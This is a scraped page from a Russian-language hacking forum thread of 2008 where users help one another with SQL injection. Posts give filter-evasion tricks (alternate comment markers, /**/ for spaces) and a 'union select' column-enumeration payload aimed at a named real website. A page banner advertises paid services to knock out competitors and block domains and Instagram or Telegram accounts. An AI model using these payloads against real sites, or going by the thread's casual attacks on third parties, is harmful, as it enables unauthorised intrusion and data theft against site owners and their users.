Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 336 из 2438

336

Опции темы

Поиск в этой теме

Опции просмотра

#3351

25.09.2008, 00:23

IND1G0

Новичок

Регистрация: 21.09.2008

Сообщений: 9

С нами: 9283286

Репутация: 1

если даже так разницы нет)

А да и еще на сайте есть XSS
http://сайт/id=[XSS]/*

Последний раз редактировалось IND1G0; 25.09.2008 в 00:30..

#3352

25.09.2008, 00:28

R1dex

Участник форума

Регистрация: 17.09.2008

Сообщений: 211

С нами: 9288132

Репутация: 571

Ссылку хоть дай

#3353

25.09.2008, 00:28

~~cash$$$~~

Banned

Регистрация: 06.01.2008

Сообщений: 413

С нами: 9655526

Репутация: 1334

А оставить ковычку пробывал?

#3354

25.09.2008, 00:36

IND1G0

Новичок

Регистрация: 21.09.2008

Сообщений: 9

С нами: 9283286

Репутация: 1

Да уже все перепробовал...
Мне интересно почему висит вот эта ошибка постоянно независимо от того что вбивать в http://сайт/id=/*
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 16

#3355

25.09.2008, 01:26

MirA

Новичок

Регистрация: 24.07.2008

Сообщений: 29

С нами: 9367310

Репутация: 52

Цитата:

Сообщение от IND1G0

Попробуй использовать такой комент "--" вместо "/*"

#3356

25.09.2008, 01:34

IND1G0

Новичок

Регистрация: 21.09.2008

Сообщений: 9

С нами: 9283286

Репутация: 1

Цитата:

Сообщение от MirA

Попробуй использовать такой комент "--" вместо "/*"

тоже уже пробовал

#3357

25.09.2008, 04:02

o3,14um

Участник форума

Регистрация: 16.11.2006

Сообщений: 230

С нами: 10254549

Репутация: 227

а ещё вот такой +--+

и проверь на раскрытые скобки в запросе. Попробуй проанализировать, что там фильтруется

#3358

25.09.2008, 13:05

DJ ][akep

Познающий

Регистрация: 27.01.2008

Сообщений: 57

С нами: 9625938

Репутация: 32

Помогите SQL-inj
Вот кол-во столбцов вроде подобрал

PHP код:


		
			
http://moy-gorod.com.ua/cat.phtml?curcat=-999'+order+by+21/*

но так нехочет:

PHP код:


		
			
http://moy-gorod.com.ua/cat.phtml?curcat=-999'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*

#3359

25.09.2008, 13:38

SIdoy

Новичок

Регистрация: 19.09.2007

Сообщений: 12

С нами: 9812750

Репутация: 19

Цитата:

Сообщение от IND1G0

http://сайт/id=0+union+select+1/*

Выводит

(страница 0 union select 1/* из 1)
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 16

Такая ошибка выходит постоянно, перебрал до http://сайт/id=0+union+select+1,...,35/*
Как можно заюзать эту ошибку?

Попробуй вместо пробелов /**/

id=0/**/union/**/select/**/1/*

#3360

25.09.2008, 13:51

USAkid

Участник форума

Регистрация: 17.06.2008

Сообщений: 214

С нами: 9420866

Репутация: 228

у меня была такая же трабла с запросом. Когда подставляешь ` (обратную кавычку) то результат меняется...

Страница 336 из 2438

336

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход